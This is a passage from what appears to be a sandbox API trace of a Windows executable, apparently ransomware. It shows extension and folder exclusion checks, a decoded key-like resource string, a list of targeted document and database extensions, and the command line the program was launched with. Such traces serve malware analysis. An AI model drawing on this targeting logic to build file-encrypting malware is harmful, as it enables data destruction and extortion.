lpString1="000", cchCount1=3, lpString2="[ND_START]", cchCount2=10) returned 3 [0116.481] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="SYS", cchCount1=3, lpString2="[ND_START]", cchCount2=10) returned 3 [0116.481] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="DAT", cchCount1=3, lpString2="[ND_START]", cchCount2=10) returned 3 [0116.481] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="RTF", cchCount1=3, lpString2="[ND_START]", cchCount2=10) returned 3 [0116.481] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="INF", cchCount1=3, lpString2="[ND_START]", cchCount2=10) returned 3 [0116.481] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="DLL", cchCount1=3, lpString2="[ND_START]", cchCount2=10) returned 3 [0116.481] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="DAT", cchCount1=3, lpString2="[ND_START]", cchCount2=10) returned 3 [0116.481] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="REG", cchCount1=3, lpString2="[ND_START]", cchCount2=10) returned 3 [0116.481] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="DRV", cchCount1=3, lpString2="[ND_START]", cchCount2=10) returned 3 [0116.482] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="DEV", cchCount1=3, lpString2="[ND_START]", cchCount2=10) returned 3 [0116.482] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="PIF", cchCount1=3, lpString2="[ND_START]", cchCount2=10) returned 3 [0116.482] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="MBR", cchCount1=3, lpString2="[ND_START]", cchCount2=10) returned 3 [0116.482] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="INI", cchCount1=3, lpString2="[ND_START]", cchCount2=10) returned 3 [0116.482] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="XML", cchCount1=3, lpString2="[ND_START]", cchCount2=10) returned 3 [0116.482] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="LIST", cchCount1=4, lpString2="[ND_START]", cchCount2=10) returned 3 [0116.482] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="TTF", cchCount1=3, lpString2="[ND_START]", cchCount2=10) returned 3 [0116.482] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="LOG", cchCount1=3, lpString2="[ND_START]", cchCount2=10) returned 3 [0116.482] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="JA", cchCount1=2, lpString2="[ND_START]", cchCount2=10) returned 3 [0116.482] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="COM", cchCount1=3, lpString2="[ND_START]", cchCount2=10) returned 3 [0116.482] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="BAT", cchCount1=3, lpString2="[ND_START]", cchCount2=10) returned 3 [0116.482] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="CMD", cchCount1=3, lpString2="[ND_START]", cchCount2=10) returned 3 [0116.482] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="VBS", cchCount1=3, lpString2="[ND_START]", cchCount2=10) returned 3 [0116.482] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="JS", cchCount1=2, lpString2="[ND_START]", cchCount2=10) returned 3 [0116.482] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="CFG", cchCount1=3, lpString2="[ND_START]", cchCount2=10) returned 3 [0116.482] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="DOWNLOAD", cchCount1=8, lpString2="[ND_START]", cchCount2=10) returned 3 [0116.482] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="NFO", cchCount1=3, lpString2="[ND_START]", cchCount2=10) returned 3 [0116.482] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="MSI", cchCount1=3, lpString2="[ND_START]", cchCount2=10) returned 3 [0116.482] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="CHK", cchCount1=3, lpString2="[ND_START]", cchCount2=10) returned 3 [0116.482] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="DMP", cchCount1=3, lpString2="[ND_START]", cchCount2=10) returned 3 [0116.482] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="MUI", cchCount1=3, lpString2="[ND_START]", cchCount2=10) returned 3 [0116.482] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="DUN", cchCount1=3, lpString2="[ND_START]", cchCount2=10) returned 3 [0116.482] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ISP", cchCount1=3, lpString2="[ND_START]", cchCount2=10) returned 3 [0116.482] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ISW", cchCount1=3, lpString2="[ND_START]", cchCount2=10) returned 3 [0116.482] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="CAB", cchCount1=3, lpString2="[ND_START]", cchCount2=10) returned 3 [0116.482] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="EFI", cchCount1=3, lpString2="[ND_START]", cchCount2=10) returned 3 [0116.482] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="HLP", cchCount1=3, lpString2="[ND_START]", cchCount2=10) returned 3 [0116.482] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="MSU", cchCount1=3, lpString2="[ND_START]", cchCount2=10) returned 3 [0116.482] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="HLP", cchCount1=3, lpString2="[ND_START]", cchCount2=10) returned 3 [0116.482] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="BIN", cchCount1=3, lpString2="[ND_START]", cchCount2=10) returned 3 [0116.482] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="LNG", cchCount1=3, lpString2="[ND_START]", cchCount2=10) returned 3 [0116.483] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="TORRENT_INFO", cchCount1=12, lpString2="[ND_START]", cchCount2=10) returned 3 [0116.483] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="TORRENT", cchCount1=7, lpString2="[ND_START]", cchCount2=10) returned 3 [0116.483] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="HTM", cchCount1=3, lpString2="[ND_START]", cchCount2=10) returned 3 [0116.483] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="HTML", cchCount1=4, lpString2="[ND_START]", cchCount2=10) returned 3 [0116.483] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="CHM", cchCount1=3, lpString2="[ND_START]", cchCount2=10) returned 3 [0116.483] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="LANG", cchCount1=4, lpString2="[ND_START]", cchCount2=10) returned 3 [0116.483] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="STYLE", cchCount1=5, lpString2="[ND_START]", cchCount2=10) returned 3 [0116.483] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="MP3", cchCount1=3, lpString2="[ND_START]", cchCount2=10) returned 3 [0116.483] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="FLAC", cchCount1=4, lpString2="[ND_START]", cchCount2=10) returned 3 [0116.483] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="OGG", cchCount1=3, lpString2="[ND_START]", cchCount2=10) returned 3 [0116.483] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="WMA", cchCount1=3, lpString2="[ND_START]", cchCount2=10) returned 3 [0116.483] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="GIF", cchCount1=3, lpString2="[ND_START]", cchCount2=10) returned 3 [0116.483] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="JAVA", cchCount1=4, lpString2="[ND_START]", cchCount2=10) returned 3 [0116.483] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="CUR", cchCount1=3, lpString2="[ND_START]", cchCount2=10) returned 3 [0116.483] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ANI", cchCount1=3, lpString2="[ND_START]", cchCount2=10) returned 3 [0116.483] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="[NF_END]", cchCount1=8, lpString2="[ND_START]", cchCount2=10) returned 3 [0116.483] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="[ND_START]", cchCount1=10, lpString2="[ND_START]", cchCount2=10) returned 2 [0116.483] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="[NF_START]", cchCount1=10, lpString2="[ND_END]", cchCount2=8) returned 3 [0116.483] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="AST", cchCount1=3, lpString2="[ND_END]", cchCount2=8) returned 3 [0116.483] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="AFN", cchCount1=3, lpString2="[ND_END]", cchCount2=8) returned 3 [0116.483] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ELST", cchCount1=4, lpString2="[ND_END]", cchCount2=8) returned 3 [0116.483] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="EXE", cchCount1=3, lpString2="[ND_END]", cchCount2=8) returned 3 [0116.483] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="LNK", cchCount1=3, lpString2="[ND_END]", cchCount2=8) returned 3 [0116.483] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="HTA", cchCount1=3, lpString2="[ND_END]", cchCount2=8) returned 3 [0116.483] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="PEK", cchCount1=3, lpString2="[ND_END]", cchCount2=8) returned 3 [0116.483] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="SEK", cchCount1=3, lpString2="[ND_END]", cchCount2=8) returned 3 [0116.483] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="B10CKED", cchCount1=7, lpString2="[ND_END]", cchCount2=8) returned 3 [0116.483] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="TMP", cchCount1=3, lpString2="[ND_END]", cchCount2=8) returned 3 [0116.483] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ICO", cchCount1=3, lpString2="[ND_END]", cchCount2=8) returned 3 [0116.483] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="000", cchCount1=3, lpString2="[ND_END]", cchCount2=8) returned 3 [0116.483] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="SYS", cchCount1=3, lpString2="[ND_END]", cchCount2=8) returned 3 [0116.483] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="DAT", cchCount1=3, lpString2="[ND_END]", cchCount2=8) returned 3 [0116.483] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="RTF", cchCount1=3, lpString2="[ND_END]", cchCount2=8) returned 3 [0116.483] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="INF", cchCount1=3, lpString2="[ND_END]", cchCount2=8) returned 3 [0116.483] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="DLL", cchCount1=3, lpString2="[ND_END]", cchCount2=8) returned 3 [0116.483] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="DAT", cchCount1=3, lpString2="[ND_END]", cchCount2=8) returned 3 [0116.483] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="REG", cchCount1=3, lpString2="[ND_END]", cchCount2=8) returned 3 [0116.483] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="DRV", cchCount1=3, lpString2="[ND_END]", cchCount2=8) returned 3 [0116.483] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="DEV", cchCount1=3, lpString2="[ND_END]", cchCount2=8) returned 3 [0116.483] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="PIF", cchCount1=3, lpString2="[ND_END]", cchCount2=8) returned 3 [0116.483] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="MBR", cchCount1=3, lpString2="[ND_END]", cchCount2=8) returned 3 [0116.484] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="INI", cchCount1=3, lpString2="[ND_END]", cchCount2=8) returned 3 [0116.484] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="XML", cchCount1=3, lpString2="[ND_END]", cchCount2=8) returned 3 [0116.484] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="LIST", cchCount1=4, lpString2="[ND_END]", cchCount2=8) returned 3 [0116.484] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="TTF", cchCount1=3, lpString2="[ND_END]", cchCount2=8) returned 3 [0116.484] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="LOG", cchCount1=3, lpString2="[ND_END]", cchCount2=8) returned 3 [0116.484] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="JA", cchCount1=2, lpString2="[ND_END]", cchCount2=8) returned 3 [0116.484] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="COM", cchCount1=3, lpString2="[ND_END]", cchCount2=8) returned 3 [0116.484] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="BAT", cchCount1=3, lpString2="[ND_END]", cchCount2=8) returned 3 [0116.484] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="CMD", cchCount1=3, lpString2="[ND_END]", cchCount2=8) returned 3 [0116.484] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="VBS", cchCount1=3, lpString2="[ND_END]", cchCount2=8) returned 3 [0116.484] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="JS", cchCount1=2, lpString2="[ND_END]", cchCount2=8) returned 3 [0116.484] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="CFG", cchCount1=3, lpString2="[ND_END]", cchCount2=8) returned 3 [0116.484] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="DOWNLOAD", cchCount1=8, lpString2="[ND_END]", cchCount2=8) returned 3 [0116.484] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="NFO", cchCount1=3, lpString2="[ND_END]", cchCount2=8) returned 3 [0116.484] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="MSI", cchCount1=3, lpString2="[ND_END]", cchCount2=8) returned 3 [0116.484] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="CHK", cchCount1=3, lpString2="[ND_END]", cchCount2=8) returned 3 [0116.484] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="DMP", cchCount1=3, lpString2="[ND_END]", cchCount2=8) returned 3 [0116.484] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="MUI", cchCount1=3, lpString2="[ND_END]", cchCount2=8) returned 3 [0116.484] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="DUN", cchCount1=3, lpString2="[ND_END]", cchCount2=8) returned 3 [0116.484] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ISP", cchCount1=3, lpString2="[ND_END]", cchCount2=8) returned 3 [0116.484] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ISW", cchCount1=3, lpString2="[ND_END]", cchCount2=8) returned 3 [0116.484] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="CAB", cchCount1=3, lpString2="[ND_END]", cchCount2=8) returned 3 [0116.484] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="EFI", cchCount1=3, lpString2="[ND_END]", cchCount2=8) returned 3 [0116.484] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="HLP", cchCount1=3, lpString2="[ND_END]", cchCount2=8) returned 3 [0116.484] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="MSU", cchCount1=3, lpString2="[ND_END]", cchCount2=8) returned 3 [0116.484] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="HLP", cchCount1=3, lpString2="[ND_END]", cchCount2=8) returned 3 [0116.484] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="BIN", cchCount1=3, lpString2="[ND_END]", cchCount2=8) returned 3 [0116.484] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="LNG", cchCount1=3, lpString2="[ND_END]", cchCount2=8) returned 3 [0116.484] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="TORRENT_INFO", cchCount1=12, lpString2="[ND_END]", cchCount2=8) returned 3 [0116.484] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="TORRENT", cchCount1=7, lpString2="[ND_END]", cchCount2=8) returned 3 [0116.484] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="HTM", cchCount1=3, lpString2="[ND_END]", cchCount2=8) returned 3 [0116.484] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="HTML", cchCount1=4, lpString2="[ND_END]", cchCount2=8) returned 3 [0116.484] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="CHM", cchCount1=3, lpString2="[ND_END]", cchCount2=8) returned 3 [0116.484] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="LANG", cchCount1=4, lpString2="[ND_END]", cchCount2=8) returned 3 [0116.484] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="STYLE", cchCount1=5, lpString2="[ND_END]", cchCount2=8) returned 3 [0116.484] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="MP3", cchCount1=3, lpString2="[ND_END]", cchCount2=8) returned 3 [0116.484] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="FLAC", cchCount1=4, lpString2="[ND_END]", cchCount2=8) returned 3 [0116.484] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="OGG", cchCount1=3, lpString2="[ND_END]", cchCount2=8) returned 3 [0116.484] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="WMA", cchCount1=3, lpString2="[ND_END]", cchCount2=8) returned 3 [0116.484] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="GIF", cchCount1=3, lpString2="[ND_END]", cchCount2=8) returned 3 [0116.484] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="JAVA", cchCount1=4, lpString2="[ND_END]", cchCount2=8) returned 3 [0116.484] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="CUR", cchCount1=3, lpString2="[ND_END]", cchCount2=8) returned 3 [0116.484] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ANI", cchCount1=3, lpString2="[ND_END]", cchCount2=8) returned 3 [0116.484] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="[NF_END]", cchCount1=8, lpString2="[ND_END]", cchCount2=8) returned 3 [0116.485] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="[ND_START]", cchCount1=10, lpString2="[ND_END]", cchCount2=8) returned 3 [0116.485] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\WINDOWS", cchCount1=8, lpString2="[ND_END]", cchCount2=8) returned 3 [0116.485] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\PROGRAM FILES", cchCount1=14, lpString2="[ND_END]", cchCount2=8) returned 3 [0116.485] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\GAMES", cchCount1=6, lpString2="[ND_END]", cchCount2=8) returned 3 [0116.485] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\APPDATA\\", cchCount1=9, lpString2="[ND_END]", cchCount2=8) returned 3 [0116.485] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\APPLICATION DATA\\", cchCount1=18, lpString2="[ND_END]", cchCount2=8) returned 3 [0116.485] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\LOCAL SETTINGS\\", cchCount1=16, lpString2="[ND_END]", cchCount2=8) returned 3 [0116.485] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\TEMP\\", cchCount1=6, lpString2="[ND_END]", cchCount2=8) returned 3 [0116.485] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\PROGRAMDATA\\", cchCount1=13, lpString2="[ND_END]", cchCount2=8) returned 3 [0116.485] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\BOOT\\", cchCount1=6, lpString2="[ND_END]", cchCount2=8) returned 3 [0116.485] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\MSOCACHE\\", cchCount1=10, lpString2="[ND_END]", cchCount2=8) returned 3 [0116.485] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\DEFAULT USER\\", cchCount1=14, lpString2="[ND_END]", cchCount2=8) returned 3 [0116.485] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\SAMPLE", cchCount1=7, lpString2="[ND_END]", cchCount2=8) returned 3 [0116.485] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\EXAMPLE", cchCount1=8, lpString2="[ND_END]", cchCount2=8) returned 3 [0116.485] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\I386", cchCount1=5, lpString2="[ND_END]", cchCount2=8) returned 3 [0116.485] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\TEMPORARY", cchCount1=10, lpString2="[ND_END]", cchCount2=8) returned 3 [0116.485] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\TOR BROWSER\\", cchCount1=13, lpString2="[ND_END]", cchCount2=8) returned 3 [0116.485] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\BROWSER", cchCount1=8, lpString2="[ND_END]", cchCount2=8) returned 3 [0116.485] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="BROWSER\\", cchCount1=8, lpString2="[ND_END]", cchCount2=8) returned 3 [0116.485] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="[ND_END]", cchCount1=8, lpString2="[ND_END]", cchCount2=8) returned 2 [0116.485] GetCurrentThreadId () returned 0xdf8 [0116.485] GetCurrentThreadId () returned 0xdf8 [0116.485] GetCurrentThreadId () returned 0xdf8 [0116.485] FindResourceW (hModule=0x400000, lpName="PRL", lpType=0xa) returned 0x51c498 [0116.485] LoadResource (hModule=0x400000, hResInfo=0x51c498) returned 0x516f58 [0116.485] SizeofResource (hModule=0x400000, hResInfo=0x51c498) returned 0x61 [0116.485] LockResource (hResData=0x516f58) returned 0x516f58 [0116.485] FreeResource (hResData=0x516f58) returned 0 [0116.485] FindResourceW (hModule=0x400000, lpName="CHAK", lpType=0xa) returned 0x51c330 [0116.485] LoadResource (hModule=0x400000, hResInfo=0x51c330) returned 0x50d64c [0116.485] SizeofResource (hModule=0x400000, hResInfo=0x51c330) returned 0x26 [0116.485] LockResource (hResData=0x50d64c) returned 0x50d64c [0116.485] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x14150b0, cbMultiByte=38, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 38 [0116.485] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x14150b0, cbMultiByte=38, lpWideCharStr=0x140de4c, cchWideChar=38 | out: lpWideCharStr="kQmxlKgqYq97OjjM8tuCoiCC94l6BG4P\r\n42\r\n") returned 38 [0116.485] FreeResource (hResData=0x50d64c) returned 0 [0116.485] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="kQmxlKgqYq97OjjM8tuCoiCC94l6BG4P", cchWideChar=32, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 32 [0116.485] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="kQmxlKgqYq97OjjM8tuCoiCC94l6BG4P", cchWideChar=32, lpMultiByteStr=0x14150b4, cbMultiByte=32, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="kQmxlKgqYq97OjjM8tuCoiCC94l6BG4P", lpUsedDefaultChar=0x0) returned 32 [0116.485] GetCurrentThreadId () returned 0xdf8 [0116.485] GetCurrentThreadId () returned 0xdf8 [0116.485] GetCurrentThreadId () returned 0xdf8 [0116.485] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x13a4258, cbMultiByte=97, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 97 [0116.485] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x13a4258, cbMultiByte=97, lpWideCharStr=0x1372ebc, cchWideChar=97 | out: lpWideCharStr="1CD\r\nDT\r\nDBS\r\nDBF\r\nDBX\r\nMDB\r\nMDF\r\nSDF\r\nACCDB\r\nXLSX\r\nXLS\r\nDOCX\r\nDOC\r\nODS\r\nODT\r\nPDF\r\nJPG\r\nJPEG\r\nTXT") returned 97 [0116.486] CharLowerBuffW (in: lpsz="AST", cchLength=0x3 | out: lpsz="ast") returned 0x3 [0116.486] CharLowerBuffW (in: lpsz="AFN", cchLength=0x3 | out: lpsz="afn") returned 0x3 [0116.486] CharLowerBuffW (in: lpsz="ELST", cchLength=0x4 | out: lpsz="elst") returned 0x4 [0116.486] CharLowerBuffW (in: lpsz="EXE", cchLength=0x3 | out: lpsz="exe") returned 0x3 [0116.486] CharLowerBuffW (in: lpsz="LNK", cchLength=0x3 | out: lpsz="lnk") returned 0x3 [0116.486] CharLowerBuffW (in: lpsz="HTA", cchLength=0x3 | out: lpsz="hta") returned 0x3 [0116.486] CharLowerBuffW (in: lpsz="PEK", cchLength=0x3 | out: lpsz="pek") returned 0x3 [0116.486] CharLowerBuffW (in: lpsz="SEK", cchLength=0x3 | out: lpsz="sek") returned 0x3 [0116.486] CharLowerBuffW (in: lpsz="B10CKED", cchLength=0x7 | out: lpsz="b10cked") returned 0x7 [0116.486] CharLowerBuffW (in: lpsz="TMP", cchLength=0x3 | out: lpsz="tmp") returned 0x3 [0116.486] CharLowerBuffW (in: lpsz="ICO", cchLength=0x3 | out: lpsz="ico") returned 0x3 [0116.486] GetCommandLineW () returned="\"C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\GYm4NxCU.exe\" \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\vMfCCeRYkvQy\\\" \"7l6OWDI9Fmrsoy1O\" \"FILESEXTLIST\" \"60000\" \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\vMfCCeRYkvQy\\7l6OWDI9Fmrsoy1O.elst\" \"1\"" [0116.486] GetCommandLineW () returned="\"C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\GYm4NxCU.exe\" \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\vMfCCeRYkvQy\\\" \"7l6OWDI9Fmrsoy1O\" \"FILESEXTLIST\" \"60000\" \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\vMfCCeRYkvQy\\7l6OWDI9Fmrsoy1O.elst\" \"1\"" [0116.486] GetCommandLineW () returned="\"C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\GYm4NxCU.exe\" \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\vMfCCeRYkvQy\\\" \"7l6OWDI9Fmrsoy1O\" \"FILESEXTLIST\" \"60000\" \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\vMfCCeRYkvQy\\7l6OWDI9Fmrsoy1O.elst\" \"1\"" [0116.486] GetCommandLineW () returned="\"C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\GYm4NxCU.exe\" \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\vMfCCeRYkvQy\\\" \"7l6OWDI9Fmrsoy1O\" \"FILESEXTLIST\" \"60000\" \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\vMfCCeRYkvQy\\7l6OWDI9Fmrsoy1O.elst\" \"1\"" [0116.486] GetCommandLineW () returned="\"C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\GYm4NxCU.exe\" \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\vMfCCeRYkvQy\\\" \"7l6OWDI9Fmrsoy1O\" \"FILESEXTLIST\" \"60000\" \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\vMfCCeRYkvQy\\7l6OWDI9Fmrsoy1O.elst\" \"1\"" [0116.486] GetCommandLineW () returned="\"C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\GYm4NxCU.exe\" \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\vMfCCeRYkvQy\\\" \"7l6OWDI9Fmrsoy1O\" \"FILESEXTLIST\" \"60000\" \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\vMfCCeRYkvQy\\7l6OWDI9Fmrsoy1O.elst\" \"1\"" [0116.486] GetCommandLineW () returned="\"C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\GYm4NxCU.exe\" \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\vMfCCeRYkvQy\\\" \"7l6OWDI9Fmrsoy1O\" \"FILESEXTLIST\" \"60000\" \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\vMfCCeRYkvQy\\7l6OWDI9Fmrsoy1O.elst\" \"1\"" [0116.486] GetCommandLineW () returned="\"C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\GYm4NxCU.exe\" \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\vMfCCeRYkvQy\\\" \"7l6OWDI9Fmrsoy1O\" \"FILESEXTLIST\" \"60000\" 